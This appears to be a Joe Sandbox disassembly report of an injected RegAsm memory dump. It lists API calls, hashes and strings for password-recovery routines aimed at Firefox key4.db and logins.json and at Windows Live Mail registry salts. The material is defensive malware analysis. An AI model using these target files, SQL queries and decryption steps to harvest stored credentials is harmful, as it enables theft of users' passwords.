                                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040BECE
                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                                                  • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                                                  • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                                                • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                                                • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                                                • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                • API String ID: 2303586283-933021314
                                                                                                                                                                                                • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                                                                                • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                                                                                                • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                                                • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                • API String ID: 231171946-2189169393
                                                                                                                                                                                                • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                • API String ID: 633282248-1996832678
                                                                                                                                                                                                • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                                                                • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00406782
                                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                                • memcmp.MSVCRT ref: 0040686E
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                                • memcmp.MSVCRT ref: 004068EC
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                                • memcmp.MSVCRT ref: 004069B2
                                                                                                                                                                                                • memcmp.MSVCRT ref: 004069CA
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                                • memcmp.MSVCRT ref: 00406A4A
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                                • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • , xrefs: 00406834
                                                                                                                                                                                                • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                                • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                                • key4.db, xrefs: 00406756
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                                • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                • API String ID: 3614188050-3983245814
                                                                                                                                                                                                • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                                                • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                • API String ID: 710961058-601624466
                                                                                                                                                                                                • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                                                                                • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                                                • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                • API String ID: 3402215030-3842416460
                                                                                                                                                                                                • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                                                                • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                                                • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                                  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000), ref: 00407B6E
                                                                                                                                                                                                  • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                                  • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                                  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                                • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                                • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                                • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                                • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                                • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                • API String ID: 2003275452-3138536805
                                                                                                                                                                                                • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                                                                • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                                                                • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                                • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                                • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                                • API String ID: 1012775001-1343505058
                                                                                                                                                                                                • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                                                                • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                                                                • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _strcmpi
                                                                                                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                • API String ID: 1439213657-1959339147
                                                                                                                                                                                                • Opcode ID: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                                                                                • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                                                                                                                                • Opcode Fuzzy Hash: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00444612
                                                                                                                                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                                • memset.MSVCRT ref: 00444668
                                                                                                                                                                                                • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                                • memset.MSVCRT ref: 00444690
                                                                                                                                                                                                • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                • String ID: salu
                                                                                                                                                                                                • API String ID: 3691931180-4177317985
                                                                                                                                                                                                • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                                                                • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                                                                                                                                • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                                                • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                                                                  • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                                                • Salt, xrefs: 00443BA7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscpymemset$??2@??3@ByteCharCloseFreeLibraryLoadLocalMultiWidestrlenstrtoul
                                                                                                                                                                                                • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                                                • API String ID: 2976261921-2687544566
                                                                                                                                                                                                • Opcode ID: b08930b7453e48b2f0e0d8293135145b455c914adee6aec8c07cda6f7bc59332
                                                                                                                                                                                                • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                                                                                                                • Opcode Fuzzy Hash: b08930b7453e48b2f0e0d8293135145b455c914adee6aec8c07cda6f7bc59332
                                                                                                                                                                                                • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                • memset.MSVCRT ref: 00403ECE
                                                                                                                                                                                                • memset.MSVCRT ref: 00403EE2
                                                                                                                                                                                                • memset.MSVCRT ref: 00403EF6
                                                                                                                                                                                                • sprintf.MSVCRT ref: 00403F17
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                                                                                                                                                                • sprintf.MSVCRT ref: 00403F6A
                                                                                                                                                                                                • sprintf.MSVCRT ref: 00403F9B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                                                                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                                                                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                                                                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                                                                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                • API String ID: 113626815-1670831295
                                                                                                                                                                                                • Opcode ID: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                                                                                • Instruction ID: 68eec6ff6ffa0e14b7f0c60be0e91221167be1d604113ab21f184662466f1ff3
                                                                                                                                                                                                • Opcode Fuzzy Hash: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0931A5B3D00258BEEB50DB54CC82FDE77ACEF54305F1001ABF548A3141DA78AB888B69
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                                • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                                  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                                  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                                  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                                  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                                • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                                • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                                • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                                • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                                • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                                • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                                • API String ID: 3259144588-3822380221
                                                                                                                                                                                                • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                                                                • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004047DA
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                • API String ID: 1029625771-192783356
                                                                                                                                                                                                • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                                • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                                                                                • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
